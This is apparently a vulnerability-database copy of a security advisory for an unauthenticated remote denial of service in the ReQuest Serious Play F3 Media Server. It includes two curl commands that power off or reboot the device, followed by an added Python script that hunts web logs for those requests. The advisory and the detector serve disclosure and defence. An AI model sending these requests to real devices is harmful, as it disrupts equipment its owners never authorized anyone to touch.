ReQuest Serious Play F3 Media Server 7.0.3 Remote Denial of Service

18 Oct 2020 00:00:00
Reported by: Gjoko Krstic
Type: zeroscience
Source: www.zeroscience.mk

ReQuest Serious Play F3 Media Server 7.0.3 Remote Denial of Service. An unauthenticated attacker can shut down or reboot the device with one HTTP GET request.

Related

Reporter: Title (Published)
CNNVD: ReQuest Serious Play Pro security vulnerability (14 Nov 2025 00:00)
CVE: CVE-2021-4465 (14 Nov 2025 22:51)
Cvelist: CVE-2021-4465 ReQuest Serious Play F3 Media Server <= 7.0.3 Remote DoS (14 Nov 2025 22:51)
EUVD: EUVD-2021-34720 (14 Nov 2025 22:51)
NVD: CVE-2021-4465 (14 Nov 2025 23:15)
Positive Technologies: PT-2025-47016 (14 Nov 2025 00:00)
RedhatCVE: CVE-2021-4465 (17 Nov 2025 09:07)
Vulnrichment: CVE-2021-4465 ReQuest Serious Play F3 Media Server <= 7.0.3 Remote DoS (14 Nov 2025 22:51)

ReQuest Serious Play F3 Media Server 7.0.3 Remote Denial of Service


Vendor: ReQuest Serious Play LLC
Product web page: http://www.request.com
Affected version: 7.0.3.4968 (Pro)
                  7.0.2.4954
                  6.5.2.4954
                  6.4.2.4681
                  6.3.2.4203
                  2.0.1.823

Summary: F3 packs all the power of ReQuest's multi-zone serious Play servers
into a compact powerhouse. With the ability to add unlimited NAS devices, the
F3 can handle your entire family's media collection with ease.

Desc: The device can be shutdown or rebooted by an unauthenticated attacker
when issuing one HTTP GET request.

Tested on: ReQuest Serious Play® OS v7.0.1
           ReQuest Serious Play® OS v6.0.0
           Debian GNU/Linux 5.0
           Linux 3.2.0-4-686-pae
           Linux 2.6.36-request+lenny.5
           Apache/2.2.22
           Apache/2.2.9
           PHP/5.4.45
           PHP/5.2.6-1


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Macedonian Information Security Research and Development Laboratory
Zero Science Lab - https://www.zeroscience.mk - @zeroscience


Advisory ID: ZSL-2020-5601
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5601.php


01.08.2020

--


$ curl http://192.168.1.17:3664/remote/index.php?cmd=poweroff
$ curl http://192.168.1.17:3664/remote/index.php?cmd=reboot
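
For defenders, the requests described above can be hunted for in the device's web server logs. The following is an added example, not part of the original advisory or the vendor's code: it assumes the device's Apache writes the standard common/combined access-log format, and the sample log lines are constructed.

```python
import re
from urllib.parse import parse_qs, unquote

# Assumed Apache common/combined access-log layout:
# host ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)
ENDPOINT = "/remote/index.php"       # path named in the advisory
POWER_CMDS = {"poweroff", "reboot"}  # cmd values named in the advisory


def find_power_requests(lines):
    """Return (time, source, cmd, status) for every logged request that
    reaches the advisory's endpoint with a power command."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parseable access-log line
        raw_path, _, query = m["target"].partition("?")
        # Normalise the path the way the web server would before matching.
        path = re.sub(r"/+", "/", unquote(raw_path))
        if path != ENDPOINT:
            continue
        # parse_qs percent-decodes values, so encoded forms are matched too.
        for value in parse_qs(query).get("cmd", []):
            cmd = value.strip().lower()
            if cmd in POWER_CMDS:
                hits.append((m["time"], m["src"], cmd, int(m["status"])))
    return hits


# Constructed sample lines (documentation-range addresses), not real traffic.
SAMPLE = [
    '198.51.100.7 - - [18/Oct/2020:10:01:02 +0000] '
    '"GET /remote/index.php?cmd=poweroff HTTP/1.1" 200 12 "-" "curl/7.68.0"',
    '192.0.2.10 - - [18/Oct/2020:10:02:00 +0000] '
    '"GET /remote/index.php?cmd=placeholder HTTP/1.1" 200 40 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [18/Oct/2020:10:03:30 +0000] '
    '"GET /remote//index.php?cmd=%72eboot HTTP/1.1" 200 12 "-" "-"',
    '192.0.2.10 - - [18/Oct/2020:10:04:00 +0000] "GET /index.php HTTP/1.1" 200 900 "-" "-"',
]

if __name__ == "__main__":
    for when, src, cmd, status in find_power_requests(SAMPLE):
        print(f"{when} {src} cmd={cmd} status={status}")
```

Because the endpoint requires no authentication, a hit from any address outside the hosts expected to control the device is worth correlating with unexplained shutdowns or reboots.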
